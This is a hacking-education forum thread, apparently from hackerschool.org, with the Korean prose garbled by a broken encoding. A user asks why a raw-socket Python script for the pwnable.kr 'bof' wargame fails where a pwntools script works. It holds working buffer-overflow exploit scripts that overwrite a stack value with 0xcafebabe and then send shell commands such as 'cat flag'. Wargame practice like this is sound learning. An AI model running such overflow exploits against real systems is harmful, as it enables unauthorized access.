½Ã½ºÅÛ ÇØÅ·

 1574, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ocal
   pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1987 [º¹»ç]


¾È³çÇϼ¼¿ä.

pwnable.kr¿¡¼­ ¹®Á¦¸¦ Ǫ´Âµ¥ pwntools ¹è¿ì±â ±ÍÂú°í Çؼ­ ±×³É socket ¸ðµâ·Î Çߴµ¥ ¿Ö ÀÌÈÄ¿¡ ¸í·É¾î¸¦ ¸Ô´Â ºÎºÐ¿¡¼­ ´Ù¸¥°É±î¿ä.

bof ¹®Á¦¸¦ ±â¹ÝÇÏ¿© ¿¹¸¦ µé¾îº¸°Ú½À´Ï´Ù.

Á¦°¡ óÀ½¿¡ Çß´ø °ÍÀº À©µµ¿ì¿¡¼­ ÆÄÀ̽ã 3À» °¡Áö°í ¾Æ·¡ ÇÁ·Î±×·¥À» ½è½À´Ï´Ù.

import socket

X = socket.socket()
X.connect(("pwnable.kr",9000))

payload = "A"*0x34 + "\xbe\xba\xfe\xca" + '\n'

X.sendall(payload.encode())

X.sendall("id\n".encode())

print(X.recv(0x100))

±×·±µ¥ ÀÌ·¸°Ô µÇ¸é id ¸í·É¾îÀÇ °á°ú°¡ Àü´ÞÀÌ ¾ÈµË´Ï´Ù.

±×·±µ¥ ¾Æ·¡Ã³·³ ÀÎÅͳݿ¡ µ¹¾Æ´Ù´Ï´Â ¼Ò½º´Â ÀÌ·±°Ô µË´Ï´Ù.

from pwn import *


r = remote("pwnable.kr", 9000)

payload = "D"*52 + "\xbe\xba\xfe\xca"

r.sendline( payload )
r.sendline('ls')
print(r.recv())
r.sendline('cat flag')
print(r.recv())
r.close()

Ãâó: https://mandu-mandu.tistory.com/71

ÀÌ ¹®Á¦ ¸»°íµµ nc¸¦ »ç¿ëÇÏ´Â ¹®Á¦ ¿©·¯°³°¡ ´Ù ÀÌ·± Çö»óÀ» ³ªÅ¸³»´Âµ¥,
pwnÀ» ±¸ÇöÇÒ ¶§ ¹«¾ùÀ» ÇØÁ־ ÀÌ°Ô µÇ´Â°É±î¿ä?

¼ÖÁ÷È÷ pwntools ±êÇãºêµµ Çѹø ¶â¾îº¸°í Çߴµ¥ µµ¹«Áö ¸ð¸£°Ú½À´Ï´Ù.

  Hit : 2221     Date : 2020/01/09 01:38



    
±ºÀÎ python3 ¹öÀüÀ» ÀÌ¿ëÇÏ½Ã´Â°Í °°³×¿ä.

±â´É¸é¿¡¼­´Â socket°ú pwntools´Â ¶È°°½À´Ï´Ù.
´Ù¸¸, python3ÀÇ encode() ÇÔ¼ö ¶§¹®ÀÎ°Í °°Àºµ¥ \xbe\xba\xfe\xca ÀÌ·¯ÇÑ Á¤»óÀûÀÎ ASCII ¹üÀ§¸¦ ³Ñ¾î³­ °ªµéÀ» encode() ÇÔ¼ö·Î ó¸®ÇÒ ½Ã ³»¿ëÀÌ ¹Ù²î°Ô µÇ´Â Çö»óÀÌ À־ ±×·±°Í °°½À´Ï´Ù.
2020/01/09  
ocal ¿ÀÈ£ ±×·¸±º¿ä ±× ºÎºÐÀ» Çѹø °íÃĺ¸°Ú½À´Ï´Ù. 2020/01/10  
ocal ¿À Á¤¸» ±×·± °Í °°³×¿ä. payload¸¦ ÆÄÀ̽㠹®ÀÚ¿­·Î ¾²Áö ¾Ê°í óÀ½ºÎÅÍ bytestringÀ¸·Î ÀÛ¼ºÇؼ­ str.encode() ¸Þ¼Òµå¸¦ ¾²Áö ¾Ê°í ¹Ù·Î º¸³»¸é Àß µË´Ï´Ù. °¨»çÇÕ´Ï´Ù. ¾Æ·¡´Â °íÄ£ ÄÚµåÀÔ´Ï´Ù.

#python3
import socket

X = socket.socket()
X.connect(("pwnable.kr",9000))

payload = b"A"*0x34 + b"\xbe\xba\xfe\xca" + b'\n'

X.sendall(payload)

X.sendall("id\n".encode())

print(X.recv(0x100))

°á°ú:
b'uid=1008(bof) gid=1008(bof) groups=1008(bof)\n'
2020/01/10  
±ºÀÎ ^_^ 2020/01/13  
1574   pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)[2]     turttle2s
10/05 1180
1573   LOB GATE¹®Á¦ Ç®¸é¼­ ±Ã±ÝÇÑÁ¡[3]     hackxx123
08/24 842
1572   libc°ü·Ã - 2[5]     lMaxl04
08/24 837
1571   ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.[3]     lMaxl04
06/29 1091
1570   ¸®¸ðÆ® ȯ°æ¿¡¼­ÀÇ ½ºÅà ÁÖ¼Ò È®ÀÎ ¹æ¹ýÀÌ ±Ã±ÝÇÕ´Ï´Ù.[2]     lMaxl04
06/16 895
1569   ÇØÅ· ÇÁ¸®¼­¹ö ¾ø¾îÁ³³ª¿ä?[1]     terfkim
04/15 1669
1568   ½ºÅÿ¡ µ¥ÀÌÅÍ ³ÖÀ» ¶§ SIGSEGV[4]     turttle2s
02/04 1407
1567   pwnable.kr echo1 Áú¹®[2]     turttle2s
06/17 1680
1566   ROP strcpy °ü·Ã Áú¹®ÀÔ´Ï´Ù.[3]     heeyoung0511
06/16 1535
1565   Level2 -> Level3 ¿¡¼­ vi¿Í /usr/bin/EditorÀÇ Â÷ÀÌ[2]     hyemin1826
07/18 1760
1564   Trainer3 ftz.hackerschool.org È£½ºÆ® Á¢¼Ó ºÒ°¡[1]     hyemin1826
07/18 3160
1563   dllÀÎÁ§¼Ç ½ÇÇèÁß Áú¹® µå¸³´Ï´Ù.[1]     kkk477
05/31 1805
1562   ÆÐŶ º¹È£È­¸¦ ¸¶½ºÅÍ ÇÏ·Á¸é ¾î¶² °úÁ¤ÀÌ ÀÖ¾î¾ßÇϳª¿ä?     sa0814
04/01 1651
1561   »ç±â[2]     jas08
03/31 1944
1560   ½Ã½ºÅÛ ÄÝÀÌ °¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ª°ú ºÒ°¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ªÀÌ Á¸ÀçÇϳª¿ä?     ocal
03/30 1691
  pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?[4]     ocal
01/09 2220
1558   lob level19(nightmare) °ü·ÃÁú¹®[1]     dnjsdnwja
12/18 1701
1557   ftz level2 Áú¹®ÀÖ½À´Ï´Ù[1]     kihyun1998
12/13 1792
1556   ftz level2¹ø Ǫ´Âµ¥¿ä ±ÇÇÑÀÌ...     kihyun1998
12/06 1667
1555   ½Ã½ºÅÛÇØÅ·ÇÒ¶§ [3]     thsrhkdwns
12/05 2134
1 [2][3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org